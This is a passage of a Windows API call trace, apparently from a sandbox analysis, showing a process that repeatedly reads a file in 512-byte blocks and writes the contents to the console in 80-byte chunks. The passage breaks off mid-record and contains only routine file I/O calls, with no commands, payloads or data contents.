1 [0111.798] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.798] GetFileType (hFile=0x4c) returned 0x1 [0111.798] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.798] WriteFile (in: hFile=0x4c, lpBuffer=0x1cec6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cec6c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.846] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.846] GetFileType (hFile=0x4c) returned 0x1 [0111.846] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.846] WriteFile (in: hFile=0x4c, lpBuffer=0x1cecbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cecbc*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.846] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.846] GetFileType (hFile=0x4c) returned 0x1 [0111.846] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.846] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ced0c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.846] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.846] GetFileType (hFile=0x4c) returned 0x1 [0111.846] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.846] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced5c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ced5c*, lpNumberOfBytesWritten=0x1cdd60*=0x20, lpOverlapped=0x0) returned 1 [0111.846] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.846] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdd4c | out: lpNewFilePointer=0x0) returned 1 [0111.846] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.846] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.846] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.846] GetFileType (hFile=0x4c) returned 0x1 [0111.847] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.847] GetFileType (hFile=0x4c) returned 0x1 [0111.847] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.847] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceb7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.847] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.847] GetFileType (hFile=0x4c) returned 0x1 [0111.847] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.847] WriteFile (in: hFile=0x4c, lpBuffer=0x1cebcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cebcc*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.847] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.847] GetFileType (hFile=0x4c) returned 0x1 [0111.847] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.847] WriteFile (in: hFile=0x4c, lpBuffer=0x1cec1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cec1c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.847] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.847] GetFileType (hFile=0x4c) returned 0x1 [0111.847] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.847] WriteFile (in: hFile=0x4c, lpBuffer=0x1cec6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cec6c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.847] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.847] GetFileType (hFile=0x4c) returned 0x1 [0111.847] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.847] WriteFile (in: hFile=0x4c, lpBuffer=0x1cecbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cecbc*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.847] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.847] GetFileType (hFile=0x4c) returned 0x1 [0111.847] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.847] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ced0c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.847] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.847] GetFileType (hFile=0x4c) returned 0x1 [0111.847] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.847] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced5c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ced5c*, lpNumberOfBytesWritten=0x1cdd60*=0x20, lpOverlapped=0x0) returned 1 [0111.847] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.847] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdd4c | out: lpNewFilePointer=0x0) returned 1 [0111.847] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.847] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.847] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.847] GetFileType (hFile=0x4c) returned 0x1 [0111.847] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.848] GetFileType (hFile=0x4c) returned 0x1 [0111.848] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.848] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceb7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.848] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.848] GetFileType (hFile=0x4c) returned 0x1 [0111.848] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.848] WriteFile (in: hFile=0x4c, lpBuffer=0x1cebcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cebcc*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.848] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.848] GetFileType (hFile=0x4c) returned 0x1 [0111.848] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.848] WriteFile (in: hFile=0x4c, lpBuffer=0x1cec1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cec1c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.848] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.848] GetFileType (hFile=0x4c) returned 0x1 [0111.848] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.848] WriteFile (in: hFile=0x4c, lpBuffer=0x1cec6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cec6c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.848] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.848] GetFileType (hFile=0x4c) returned 0x1 [0111.848] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.848] WriteFile (in: hFile=0x4c, lpBuffer=0x1cecbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cecbc*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.848] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.848] GetFileType (hFile=0x4c) returned 0x1 [0111.848] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.848] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ced0c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.848] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.848] GetFileType (hFile=0x4c) returned 0x1 [0111.848] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.848] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced5c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ced5c*, lpNumberOfBytesWritten=0x1cdd60*=0x20, lpOverlapped=0x0) returned 1 [0111.848] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.848] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdd4c | out: lpNewFilePointer=0x0) returned 1 [0111.848] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.848] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.848] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.848] GetFileType (hFile=0x4c) returned 0x1 [0111.848] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.848] GetFileType (hFile=0x4c) returned 0x1 [0111.849] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.849] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceb7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.849] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.849] GetFileType (hFile=0x4c) returned 0x1 [0111.849] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.849] WriteFile (in: hFile=0x4c, lpBuffer=0x1cebcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cebcc*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.849] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.849] GetFileType (hFile=0x4c) returned 0x1 [0111.849] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.849] WriteFile (in: hFile=0x4c, lpBuffer=0x1cec1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cec1c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.849] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.849] GetFileType (hFile=0x4c) returned 0x1 [0111.849] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.849] WriteFile (in: hFile=0x4c, lpBuffer=0x1cec6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cec6c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.849] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.849] GetFileType (hFile=0x4c) returned 0x1 [0111.849] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.849] WriteFile (in: hFile=0x4c, lpBuffer=0x1cecbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cecbc*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.849] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.849] GetFileType (hFile=0x4c) returned 0x1 [0111.849] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.849] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ced0c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.849] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.849] GetFileType (hFile=0x4c) returned 0x1 [0111.849] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.849] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced5c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ced5c*, lpNumberOfBytesWritten=0x1cdd60*=0x20, lpOverlapped=0x0) returned 1 [0111.849] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.849] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdd4c | out: lpNewFilePointer=0x0) returned 1 [0111.850] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.850] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.850] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.850] GetFileType (hFile=0x4c) returned 0x1 [0111.850] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.850] GetFileType (hFile=0x4c) returned 0x1 [0111.850] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.850] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceb7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.850] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.850] GetFileType (hFile=0x4c) returned 0x1 [0111.850] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.850] WriteFile (in: hFile=0x4c, lpBuffer=0x1cebcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cebcc*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.850] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.850] GetFileType (hFile=0x4c) returned 0x1 [0111.850] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.850] WriteFile (in: hFile=0x4c, lpBuffer=0x1cec1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cec1c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.850] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.850] GetFileType (hFile=0x4c) returned 0x1 [0111.850] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.850] WriteFile (in: hFile=0x4c, lpBuffer=0x1cec6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cec6c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.850] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.850] GetFileType (hFile=0x4c) returned 0x1 [0111.850] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.850] WriteFile (in: hFile=0x4c, lpBuffer=0x1cecbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cecbc*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.850] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.850] GetFileType (hFile=0x4c) returned 0x1 [0111.850] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.850] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ced0c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.850] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.850] GetFileType (hFile=0x4c) returned 0x1 [0111.850] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.850] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced5c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ced5c*, lpNumberOfBytesWritten=0x1cdd60*=0x20, lpOverlapped=0x0) returned 1 [0111.850] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.850] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdd4c | out: lpNewFilePointer=0x0) returned 1 [0111.850] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.850] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.851] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.851] GetFileType (hFile=0x4c) returned 0x1 [0111.851] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.851] GetFileType (hFile=0x4c) returned 0x1 [0111.851] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.851] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceb7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.851] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.851] GetFileType (hFile=0x4c) returned 0x1 [0111.851] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.851] WriteFile (in: hFile=0x4c, lpBuffer=0x1cebcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cebcc*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.851] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.851] GetFileType (hFile=0x4c) returned 0x1 [0111.851] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.851] WriteFile (in: hFile=0x4c, lpBuffer=0x1cec1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cec1c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.851] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.851] GetFileType (hFile=0x4c) returned 0x1 [0111.851] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.851] WriteFile (in: hFile=0x4c, lpBuffer=0x1cec6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cec6c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.851] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.851] GetFileType (hFile=0x4c) returned 0x1 [0111.851] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.851] WriteFile (in: hFile=0x4c, lpBuffer=0x1cecbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cecbc*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.851] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.851] GetFileType (hFile=0x4c) returned 0x1 [0111.851] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.851] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ced0c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.851] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.851] GetFileType (hFile=0x4c) returned 0x1 [0111.851] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.851] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced5c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ced5c*, lpNumberOfBytesWritten=0x1cdd60*=0x20, lpOverlapped=0x0) returned 1 [0111.851] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.851] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdd4c | out: lpNewFilePointer=0x0) returned 1 [0111.851] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.851] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.852] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.852] GetFileType (hFile=0x4c) returned 0x1 [0111.852] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.852] GetFileType (hFile=0x4c) returned 0x1 [0111.852] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.852] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceb7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.852] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.852] GetFileType (hFile=0x4c) returned 0x1 [0111.852] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.852] WriteFile (in: hFile=0x4c, lpBuffer=0x1cebcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cebcc*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.852] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.852] GetFileType (hFile=0x4c) returned 0x1 [0111.852] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.852] WriteFile (in: hFile=0x4c, lpBuffer=0x1cec1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cec1c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.852] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.852] GetFileType (hFile=0x4c) returned 0x1 [0111.852] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.852] WriteFile (in: hFile=0x4c, lpBuffer=0x1cec6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cec6c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.852] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.852] GetFileType (hFile=0x4c) returned 0x1 [0111.852] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.852] WriteFile (in: hFile=0x4c, lpBuffer=0x1cecbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cecbc*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.852] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.852] GetFileType (hFile=0x4c) returned 0x1 [0111.852] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.852] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ced0c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.852] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.852] GetFileType (hFile=0x4c) returned 0x1 [0111.852] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.852] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced5c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ced5c*, lpNumberOfBytesWritten=0x1cdd60*=0x20, lpOverlapped=0x0) returned 1 [0111.852] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.852] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdd4c | out: lpNewFilePointer=0x0) returned 1 [0111.852] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.852] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.853] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.853] GetFileType (hFile=0x4c) returned 0x1 [0111.853] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.853] GetFileType (hFile=0x4c) returned 0x1 [0111.853] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.853] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceb7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.853] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.853] GetFileType (hFile=0x4c) returned 0x1 [0111.853] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.853] WriteFile (in: hFile=0x4c, lpBuffer=0x1cebcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cebcc*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.853] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.853] GetFileType (hFile=0x4c) returned 0x1 [0111.853] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.853] WriteFile (in: hFile=0x4c, lpBuffer=0x1cec1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cec1c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.853] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.853] GetFileType (hFile=0x4c) returned 0x1 [0111.853] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.853] WriteFile (in: hFile=0x4c, lpBuffer=0x1cec6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cec6c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.853] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.853] GetFileType (hFile=0x4c) returned 0x1 [0111.853] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.853] WriteFile (in: hFile=0x4c, lpBuffer=0x1cecbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cecbc*, 